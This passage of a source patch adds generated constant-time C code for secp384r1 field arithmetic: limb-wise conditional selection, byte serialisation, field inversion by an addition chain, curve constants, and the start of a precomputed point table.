++ fiat_secp384r1_addcarryx_u32(&x1127, &x1128, x1126, x1067, x1103); ++ fiat_secp384r1_addcarryx_u32(&x1129, &x1130, x1128, x1069, x1105); ++ fiat_secp384r1_addcarryx_u32(&x1131, &x1132, x1130, x1071, x1107); ++ fiat_secp384r1_addcarryx_u32(&x1133, &x1134, x1132, x1073, x1109); ++ fiat_secp384r1_addcarryx_u32(&x1135, &x1136, x1134, x1075, x1111); ++ fiat_secp384r1_addcarryx_u32(&x1137, &x1138, x1136, ++ ((uint32_t)x1076 + x1042), (x1112 + x1078)); ++ fiat_secp384r1_subborrowx_u32(&x1139, &x1140, 0x0, x1115, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1141, &x1142, x1140, x1117, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x1143, &x1144, x1142, x1119, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x1145, &x1146, x1144, x1121, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1147, &x1148, x1146, x1123, ++ UINT32_C(0xfffffffe)); ++ fiat_secp384r1_subborrowx_u32(&x1149, &x1150, x1148, x1125, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1151, &x1152, x1150, x1127, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1153, &x1154, x1152, x1129, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1155, &x1156, x1154, x1131, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1157, &x1158, x1156, x1133, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1159, &x1160, x1158, x1135, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1161, &x1162, x1160, x1137, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1163, &x1164, x1162, x1138, 0x0); ++ fiat_secp384r1_cmovznz_u32(&x1165, x1164, x1139, x1115); ++ fiat_secp384r1_cmovznz_u32(&x1166, x1164, x1141, x1117); ++ fiat_secp384r1_cmovznz_u32(&x1167, x1164, x1143, x1119); ++ fiat_secp384r1_cmovznz_u32(&x1168, x1164, x1145, x1121); ++ fiat_secp384r1_cmovznz_u32(&x1169, x1164, x1147, x1123); ++ fiat_secp384r1_cmovznz_u32(&x1170, x1164, x1149, x1125); ++ fiat_secp384r1_cmovznz_u32(&x1171, x1164, x1151, x1127); ++ fiat_secp384r1_cmovznz_u32(&x1172, x1164, x1153, x1129); ++ fiat_secp384r1_cmovznz_u32(&x1173, x1164, x1155, x1131); ++ fiat_secp384r1_cmovznz_u32(&x1174, x1164, x1157, x1133); ++ fiat_secp384r1_cmovznz_u32(&x1175, x1164, x1159, x1135); ++ fiat_secp384r1_cmovznz_u32(&x1176, x1164, x1161, x1137); ++ out1[0] = x1165; ++ out1[1] = x1166; ++ out1[2] = x1167; ++ out1[3] = x1168; ++ out1[4] = x1169; ++ out1[5] = x1170; ++ out1[6] = x1171; ++ out1[7] = x1172; ++ out1[8] = x1173; ++ out1[9] = x1174; ++ out1[10] = x1175; ++ out1[11] = x1176; ++} ++ ++/* ++ * The function fiat_secp384r1_nonzero outputs a single non-zero word if the input is non-zero and zero otherwise. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * out1 = 0 ↔ eval (from_montgomery arg1) mod m = 0 ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffff] ++ */ ++static void ++fiat_secp384r1_nonzero(uint32_t *out1, const uint32_t arg1[12]) ++{ ++ uint32_t x1; ++ x1 = ((arg1[0]) | ++ ((arg1[1]) | ++ ((arg1[2]) | ++ ((arg1[3]) | ++ ((arg1[4]) | ++ ((arg1[5]) | ++ ((arg1[6]) | ++ ((arg1[7]) | ++ ((arg1[8]) | ++ ((arg1[9]) | ++ ((arg1[10]) | ((arg1[11]) | (uint32_t)0x0)))))))))))); ++ *out1 = x1; ++} ++ ++/* ++ * The function fiat_secp384r1_selectznz is a multi-limb conditional select. ++ * Postconditions: ++ * eval out1 = (if arg1 = 0 then eval arg2 else eval arg3) ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * arg3: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_selectznz(uint32_t out1[12], ++ fiat_secp384r1_uint1 arg1, ++ const uint32_t arg2[12], ++ const uint32_t arg3[12]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint32_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint32_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint32_t x12; ++ fiat_secp384r1_cmovznz_u32(&x1, arg1, (arg2[0]), (arg3[0])); ++ fiat_secp384r1_cmovznz_u32(&x2, arg1, (arg2[1]), (arg3[1])); ++ fiat_secp384r1_cmovznz_u32(&x3, arg1, (arg2[2]), (arg3[2])); ++ fiat_secp384r1_cmovznz_u32(&x4, arg1, (arg2[3]), (arg3[3])); ++ fiat_secp384r1_cmovznz_u32(&x5, arg1, (arg2[4]), (arg3[4])); ++ fiat_secp384r1_cmovznz_u32(&x6, arg1, (arg2[5]), (arg3[5])); ++ fiat_secp384r1_cmovznz_u32(&x7, arg1, (arg2[6]), (arg3[6])); ++ fiat_secp384r1_cmovznz_u32(&x8, arg1, (arg2[7]), (arg3[7])); ++ fiat_secp384r1_cmovznz_u32(&x9, arg1, (arg2[8]), (arg3[8])); ++ fiat_secp384r1_cmovznz_u32(&x10, arg1, (arg2[9]), (arg3[9])); ++ fiat_secp384r1_cmovznz_u32(&x11, arg1, (arg2[10]), (arg3[10])); ++ fiat_secp384r1_cmovznz_u32(&x12, arg1, (arg2[11]), (arg3[11])); ++ out1[0] = x1; ++ out1[1] = x2; ++ out1[2] = x3; ++ out1[3] = x4; ++ out1[4] = x5; ++ out1[5] = x6; ++ out1[6] = x7; ++ out1[7] = x8; ++ out1[8] = x9; ++ out1[9] = x10; ++ out1[10] = x11; ++ out1[11] = x12; ++} ++ ++/* ++ * The function fiat_secp384r1_to_bytes serializes a field element in the Montgomery domain to bytes in little-endian order. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * out1 = map (λ x, ⌊((eval arg1 mod m) mod 2^(8 * (x + 1))) / 2^(8 * x)⌋) [0..47] ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff]] ++ */ ++static void ++fiat_secp384r1_to_bytes(uint8_t out1[48], const uint32_t arg1[12]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint32_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint32_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint32_t x12; ++ uint32_t x13; ++ uint8_t x14; ++ uint32_t x15; ++ uint8_t x16; ++ uint8_t x17; ++ uint8_t x18; ++ uint8_t x19; ++ uint32_t x20; ++ uint8_t x21; ++ uint32_t x22; ++ uint8_t x23; ++ uint8_t x24; ++ uint8_t x25; ++ uint8_t x26; ++ uint32_t x27; ++ uint8_t x28; ++ uint32_t x29; ++ uint8_t x30; ++ uint8_t x31; ++ uint8_t x32; ++ uint8_t x33; ++ uint32_t x34; ++ uint8_t x35; ++ uint32_t x36; ++ uint8_t x37; ++ uint8_t x38; ++ uint8_t x39; ++ uint8_t x40; ++ uint32_t x41; ++ uint8_t x42; ++ uint32_t x43; ++ uint8_t x44; ++ uint8_t x45; ++ uint8_t x46; ++ uint8_t x47; ++ uint32_t x48; ++ uint8_t x49; ++ uint32_t x50; ++ uint8_t x51; ++ uint8_t x52; ++ uint8_t x53; ++ uint8_t x54; ++ uint32_t x55; ++ uint8_t x56; ++ uint32_t x57; ++ uint8_t x58; ++ uint8_t x59; ++ uint8_t x60; ++ uint8_t x61; ++ uint32_t x62; ++ uint8_t x63; ++ uint32_t x64; ++ uint8_t x65; ++ uint8_t x66; ++ uint8_t x67; ++ uint8_t x68; ++ uint32_t x69; ++ uint8_t x70; ++ uint32_t x71; ++ uint8_t x72; ++ uint8_t x73; ++ uint8_t x74; ++ uint8_t x75; ++ uint32_t x76; ++ uint8_t x77; ++ uint32_t x78; ++ uint8_t x79; ++ uint8_t x80; ++ uint8_t x81; ++ uint8_t x82; ++ uint32_t x83; ++ uint8_t x84; ++ uint32_t x85; ++ uint8_t x86; ++ uint8_t x87; ++ uint8_t x88; ++ uint8_t x89; ++ uint32_t x90; ++ uint8_t x91; ++ uint32_t x92; ++ uint8_t x93; ++ uint8_t x94; ++ uint8_t x95; ++ x1 = (arg1[11]); ++ x2 = (arg1[10]); ++ x3 = (arg1[9]); ++ x4 = (arg1[8]); ++ x5 = (arg1[7]); ++ x6 = (arg1[6]); ++ x7 = (arg1[5]); ++ x8 = (arg1[4]); ++ x9 = (arg1[3]); ++ x10 = (arg1[2]); ++ x11 = (arg1[1]); ++ x12 = (arg1[0]); ++ x13 = (x12 >> 8); ++ x14 = (uint8_t)(x12 & UINT8_C(0xff)); ++ x15 = (x13 >> 8); ++ x16 = (uint8_t)(x13 & UINT8_C(0xff)); ++ x17 = (uint8_t)(x15 >> 8); ++ x18 = (uint8_t)(x15 & UINT8_C(0xff)); ++ x19 = (uint8_t)(x17 & UINT8_C(0xff)); ++ x20 = (x11 >> 8); ++ x21 = (uint8_t)(x11 & UINT8_C(0xff)); ++ x22 = (x20 >> 8); ++ x23 = (uint8_t)(x20 & UINT8_C(0xff)); ++ x24 = (uint8_t)(x22 >> 8); ++ x25 = (uint8_t)(x22 & UINT8_C(0xff)); ++ x26 = (uint8_t)(x24 & UINT8_C(0xff)); ++ x27 = (x10 >> 8); ++ x28 = (uint8_t)(x10 & UINT8_C(0xff)); ++ x29 = (x27 >> 8); ++ x30 = (uint8_t)(x27 & UINT8_C(0xff)); ++ x31 = (uint8_t)(x29 >> 8); ++ x32 = (uint8_t)(x29 & UINT8_C(0xff)); ++ x33 = (uint8_t)(x31 & UINT8_C(0xff)); ++ x34 = (x9 >> 8); ++ x35 = (uint8_t)(x9 & UINT8_C(0xff)); ++ x36 = (x34 >> 8); ++ x37 = (uint8_t)(x34 & UINT8_C(0xff)); ++ x38 = (uint8_t)(x36 >> 8); ++ x39 = (uint8_t)(x36 & UINT8_C(0xff)); ++ x40 = (uint8_t)(x38 & UINT8_C(0xff)); ++ x41 = (x8 >> 8); ++ x42 = (uint8_t)(x8 & UINT8_C(0xff)); ++ x43 = (x41 >> 8); ++ x44 = (uint8_t)(x41 & UINT8_C(0xff)); ++ x45 = (uint8_t)(x43 >> 8); ++ x46 = (uint8_t)(x43 & UINT8_C(0xff)); ++ x47 = (uint8_t)(x45 & UINT8_C(0xff)); ++ x48 = (x7 >> 8); ++ x49 = (uint8_t)(x7 & UINT8_C(0xff)); ++ x50 = (x48 >> 8); ++ x51 = (uint8_t)(x48 & UINT8_C(0xff)); ++ x52 = (uint8_t)(x50 >> 8); ++ x53 = (uint8_t)(x50 & UINT8_C(0xff)); ++ x54 = (uint8_t)(x52 & UINT8_C(0xff)); ++ x55 = (x6 >> 8); ++ x56 = (uint8_t)(x6 & UINT8_C(0xff)); ++ x57 = (x55 >> 8); ++ x58 = (uint8_t)(x55 & UINT8_C(0xff)); ++ x59 = (uint8_t)(x57 >> 8); ++ x60 = (uint8_t)(x57 & UINT8_C(0xff)); ++ x61 = (uint8_t)(x59 & UINT8_C(0xff)); ++ x62 = (x5 >> 8); ++ x63 = (uint8_t)(x5 & UINT8_C(0xff)); ++ x64 = (x62 >> 8); ++ x65 = (uint8_t)(x62 & UINT8_C(0xff)); ++ x66 = (uint8_t)(x64 >> 8); ++ x67 = (uint8_t)(x64 & UINT8_C(0xff)); ++ x68 = (uint8_t)(x66 & UINT8_C(0xff)); ++ x69 = (x4 >> 8); ++ x70 = (uint8_t)(x4 & UINT8_C(0xff)); ++ x71 = (x69 >> 8); ++ x72 = (uint8_t)(x69 & UINT8_C(0xff)); ++ x73 = (uint8_t)(x71 >> 8); ++ x74 = (uint8_t)(x71 & UINT8_C(0xff)); ++ x75 = (uint8_t)(x73 & UINT8_C(0xff)); ++ x76 = (x3 >> 8); ++ x77 = (uint8_t)(x3 & UINT8_C(0xff)); ++ x78 = (x76 >> 8); ++ x79 = (uint8_t)(x76 & UINT8_C(0xff)); ++ x80 = (uint8_t)(x78 >> 8); ++ x81 = (uint8_t)(x78 & UINT8_C(0xff)); ++ x82 = (uint8_t)(x80 & UINT8_C(0xff)); ++ x83 = (x2 >> 8); ++ x84 = (uint8_t)(x2 & UINT8_C(0xff)); ++ x85 = (x83 >> 8); ++ x86 = (uint8_t)(x83 & UINT8_C(0xff)); ++ x87 = (uint8_t)(x85 >> 8); ++ x88 = (uint8_t)(x85 & UINT8_C(0xff)); ++ x89 = (uint8_t)(x87 & UINT8_C(0xff)); ++ x90 = (x1 >> 8); ++ x91 = (uint8_t)(x1 & UINT8_C(0xff)); ++ x92 = (x90 >> 8); ++ x93 = (uint8_t)(x90 & UINT8_C(0xff)); ++ x94 = (uint8_t)(x92 >> 8); ++ x95 = (uint8_t)(x92 & UINT8_C(0xff)); ++ out1[0] = x14; ++ out1[1] = x16; ++ out1[2] = x18; ++ out1[3] = x19; ++ out1[4] = x21; ++ out1[5] = x23; ++ out1[6] = x25; ++ out1[7] = x26; ++ out1[8] = x28; ++ out1[9] = x30; ++ out1[10] = x32; ++ out1[11] = x33; ++ out1[12] = x35; ++ out1[13] = x37; ++ out1[14] = x39; ++ out1[15] = x40; ++ out1[16] = x42; ++ out1[17] = x44; ++ out1[18] = x46; ++ out1[19] = x47; ++ out1[20] = x49; ++ out1[21] = x51; ++ out1[22] = x53; ++ out1[23] = x54; ++ out1[24] = x56; ++ out1[25] = x58; ++ out1[26] = x60; ++ out1[27] = x61; ++ out1[28] = x63; ++ out1[29] = x65; ++ out1[30] = x67; ++ out1[31] = x68; ++ out1[32] = x70; ++ out1[33] = x72; ++ out1[34] = x74; ++ out1[35] = x75; ++ out1[36] = x77; ++ out1[37] = x79; ++ out1[38] = x81; ++ out1[39] = x82; ++ out1[40] = x84; ++ out1[41] = x86; ++ out1[42] = x88; ++ out1[43] = x89; ++ out1[44] = x91; ++ out1[45] = x93; ++ out1[46] = x95; ++ out1[47] = x94; ++} ++ ++/* ++ * The function fiat_secp384r1_from_bytes deserializes a field element in the Montgomery domain from bytes in little-endian order. ++ * Preconditions: ++ * 0 ≤ bytes_eval arg1 < m ++ * Postconditions: ++ * eval out1 mod m = bytes_eval arg1 mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_from_bytes(uint32_t out1[12], ++ const uint8_t arg1[48]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint8_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint8_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint8_t x12; ++ uint32_t x13; ++ uint32_t x14; ++ uint32_t x15; ++ uint8_t x16; ++ uint32_t x17; ++ uint32_t x18; ++ uint32_t x19; ++ uint8_t x20; ++ uint32_t x21; ++ uint32_t x22; ++ uint32_t x23; ++ uint8_t x24; ++ uint32_t x25; ++ uint32_t x26; ++ uint32_t x27; ++ uint8_t x28; ++ uint32_t x29; ++ uint32_t x30; ++ uint32_t x31; ++ uint8_t x32; ++ uint32_t x33; ++ uint32_t x34; ++ uint32_t x35; ++ uint8_t x36; ++ uint32_t x37; ++ uint32_t x38; ++ uint32_t x39; ++ uint8_t x40; ++ uint32_t x41; ++ uint32_t x42; ++ uint32_t x43; ++ uint8_t x44; ++ uint32_t x45; ++ uint32_t x46; ++ uint32_t x47; ++ uint8_t x48; ++ uint32_t x49; ++ uint32_t x50; ++ uint32_t x51; ++ uint32_t x52; ++ uint32_t x53; ++ uint32_t x54; ++ uint32_t x55; ++ uint32_t x56; ++ uint32_t x57; ++ uint32_t x58; ++ uint32_t x59; ++ uint32_t x60; ++ uint32_t x61; ++ uint32_t x62; ++ uint32_t x63; ++ uint32_t x64; ++ uint32_t x65; ++ uint32_t x66; ++ uint32_t x67; ++ uint32_t x68; ++ uint32_t x69; ++ uint32_t x70; ++ uint32_t x71; ++ x1 = ((uint32_t)(arg1[47]) << 24); ++ x2 = ((uint32_t)(arg1[46]) << 16); ++ x3 = ((uint32_t)(arg1[45]) << 8); ++ x4 = (arg1[44]); ++ x5 = ((uint32_t)(arg1[43]) << 24); ++ x6 = ((uint32_t)(arg1[42]) << 16); ++ x7 = ((uint32_t)(arg1[41]) << 8); ++ x8 = (arg1[40]); ++ x9 = ((uint32_t)(arg1[39]) << 24); ++ x10 = ((uint32_t)(arg1[38]) << 16); ++ x11 = ((uint32_t)(arg1[37]) << 8); ++ x12 = (arg1[36]); ++ x13 = ((uint32_t)(arg1[35]) << 24); ++ x14 = ((uint32_t)(arg1[34]) << 16); ++ x15 = ((uint32_t)(arg1[33]) << 8); ++ x16 = (arg1[32]); ++ x17 = ((uint32_t)(arg1[31]) << 24); ++ x18 = ((uint32_t)(arg1[30]) << 16); ++ x19 = ((uint32_t)(arg1[29]) << 8); ++ x20 = (arg1[28]); ++ x21 = ((uint32_t)(arg1[27]) << 24); ++ x22 = ((uint32_t)(arg1[26]) << 16); ++ x23 = ((uint32_t)(arg1[25]) << 8); ++ x24 = (arg1[24]); ++ x25 = ((uint32_t)(arg1[23]) << 24); ++ x26 = ((uint32_t)(arg1[22]) << 16); ++ x27 = ((uint32_t)(arg1[21]) << 8); ++ x28 = (arg1[20]); ++ x29 = ((uint32_t)(arg1[19]) << 24); ++ x30 = ((uint32_t)(arg1[18]) << 16); ++ x31 = ((uint32_t)(arg1[17]) << 8); ++ x32 = (arg1[16]); ++ x33 = ((uint32_t)(arg1[15]) << 24); ++ x34 = ((uint32_t)(arg1[14]) << 16); ++ x35 = ((uint32_t)(arg1[13]) << 8); ++ x36 = (arg1[12]); ++ x37 = ((uint32_t)(arg1[11]) << 24); ++ x38 = ((uint32_t)(arg1[10]) << 16); ++ x39 = ((uint32_t)(arg1[9]) << 8); ++ x40 = (arg1[8]); ++ x41 = ((uint32_t)(arg1[7]) << 24); ++ x42 = ((uint32_t)(arg1[6]) << 16); ++ x43 = ((uint32_t)(arg1[5]) << 8); ++ x44 = (arg1[4]); ++ x45 = ((uint32_t)(arg1[3]) << 24); ++ x46 = ((uint32_t)(arg1[2]) << 16); ++ x47 = ((uint32_t)(arg1[1]) << 8); ++ x48 = (arg1[0]); ++ x49 = (x48 + (x47 + (x46 + x45))); ++ x50 = (x49 & UINT32_C(0xffffffff)); ++ x51 = (x4 + (x3 + (x2 + x1))); ++ x52 = (x8 + (x7 + (x6 + x5))); ++ x53 = (x12 + (x11 + (x10 + x9))); ++ x54 = (x16 + (x15 + (x14 + x13))); ++ x55 = (x20 + (x19 + (x18 + x17))); ++ x56 = (x24 + (x23 + (x22 + x21))); ++ x57 = (x28 + (x27 + (x26 + x25))); ++ x58 = (x32 + (x31 + (x30 + x29))); ++ x59 = (x36 + (x35 + (x34 + x33))); ++ x60 = (x40 + (x39 + (x38 + x37))); ++ x61 = (x44 + (x43 + (x42 + x41))); ++ x62 = (x61 & UINT32_C(0xffffffff)); ++ x63 = (x60 & UINT32_C(0xffffffff)); ++ x64 = (x59 & UINT32_C(0xffffffff)); ++ x65 = (x58 & UINT32_C(0xffffffff)); ++ x66 = (x57 & UINT32_C(0xffffffff)); ++ x67 = (x56 & UINT32_C(0xffffffff)); ++ x68 = (x55 & UINT32_C(0xffffffff)); ++ x69 = (x54 & UINT32_C(0xffffffff)); ++ x70 = (x53 & UINT32_C(0xffffffff)); ++ x71 = (x52 & UINT32_C(0xffffffff)); ++ out1[0] = x50; ++ out1[1] = x62; ++ out1[2] = x63; ++ out1[3] = x64; ++ out1[4] = x65; ++ out1[5] = x66; ++ out1[6] = x67; ++ out1[7] = x68; ++ out1[8] = x69; ++ out1[9] = x70; ++ out1[10] = x71; ++ out1[11] = x51; ++} ++ ++/* END verbatim fiat code */ ++ ++/*- ++ * Finite field inversion via FLT. ++ * NB: this is not a real Fiat function, just named that way for consistency. ++ * Autogenerated: ecp/secp384r1/fe_inv.op3 ++ * custom repunit addition chain ++ */ ++static void ++fiat_secp384r1_inv(fe_t output, const fe_t t1) ++{ ++ int i; ++ /* temporary variables */ ++ fe_t acc, t10, t170, t2, t20, t255, t30, t32, t4, t64, t8, t84, t85; ++ ++ fiat_secp384r1_square(acc, t1); ++ fiat_secp384r1_mul(t2, acc, t1); ++ fiat_secp384r1_square(acc, t2); ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t4, acc, t2); ++ fiat_secp384r1_square(acc, t4); ++ for (i = 0; i < 3; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t8, acc, t4); ++ fiat_secp384r1_square(acc, t8); ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t10, acc, t2); ++ fiat_secp384r1_square(acc, t10); ++ for (i = 0; i < 9; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t20, acc, t10); ++ fiat_secp384r1_square(acc, t20); ++ for (i = 0; i < 9; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t30, acc, t10); ++ fiat_secp384r1_square(acc, t30); ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t32, acc, t2); ++ fiat_secp384r1_square(acc, t32); ++ for (i = 0; i < 31; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t64, acc, t32); ++ fiat_secp384r1_square(acc, t64); ++ for (i = 0; i < 19; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t84, acc, t20); ++ fiat_secp384r1_square(acc, t84); ++ fiat_secp384r1_mul(t85, acc, t1); ++ fiat_secp384r1_square(acc, t85); ++ for (i = 0; i < 84; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t170, acc, t85); ++ fiat_secp384r1_square(acc, t170); ++ for (i = 0; i < 84; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t255, acc, t85); ++ fiat_secp384r1_square(acc, t255); ++ for (i = 0; i < 32; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(acc, acc, t32); ++ for (i = 0; i < 94; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(acc, acc, t30); ++ for (i = 0; i < 2; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(output, acc, t1); ++} ++ ++/* curve coefficient constants */ ++ ++static const limb_t const_one[12] = { ++ UINT32_C(0x00000001), UINT32_C(0xFFFFFFFF), UINT32_C(0xFFFFFFFF), ++ UINT32_C(0x00000000), UINT32_C(0x00000001), UINT32_C(0x00000000), ++ UINT32_C(0x00000000), UINT32_C(0x00000000), UINT32_C(0x00000000), ++ UINT32_C(0x00000000), UINT32_C(0x00000000), UINT32_C(0x00000000) ++}; ++ ++static const limb_t const_b[12] = { ++ UINT32_C(0x9D412DCC), UINT32_C(0x08118871), UINT32_C(0x7A4C32EC), ++ UINT32_C(0xF729ADD8), UINT32_C(0x1920022E), UINT32_C(0x77F2209B), ++ UINT32_C(0x94938AE2), UINT32_C(0xE3374BEE), UINT32_C(0x1F022094), ++ UINT32_C(0xB62B21F4), UINT32_C(0x604FBFF9), UINT32_C(0xCD08114B) ++}; ++ ++/* LUT for scalar multiplication by comb interleaving */ ++static const pt_aff_t lut_cmb[21][16] = { ++ { ++ { { UINT32_C(0x49C0B528), UINT32_C(0x3DD07566), UINT32_C(0xA0D6CE38), ++ UINT32_C(0x20E378E2), UINT32_C(0x541B4D6E), UINT32_C(0x879C3AFC), ++ UINT32_C(0x59A30EFF), UINT32_C(0x64548684), UINT32_C(0x614EDE2B), ++ UINT32_C(0x812FF723), UINT32_C(0x299E1513), UINT32_C(0x4D3AADC2) }, ++ { UINT32_C(0x4B03A4FE), UINT32_C(0x23043DAD), UINT32_C(0x7BB4A9AC), ++ UINT32_C(0xA1BFA8BF), UINT32_C(0x2E83B050), UINT32_C(0x8BADE756), ++ UINT32_C(0x68F4FFD9), UINT32_C(0xC6C35219), UINT32_C(0x3969A840), ++ UINT32_C(0xDD800226), UINT32_C(0x5A15C5E9), UINT32_C(0x2B78ABC2) } }, ++ { { UINT32_C(0xC1DC4073), UINT32_C(0x05E4DBE6), UINT32_C(0xF04F779C), ++ UINT32_C(0xC54EA9FF), UINT32_C(0xA170CCF0), UINT32_C(0x6B2034E9), ++ 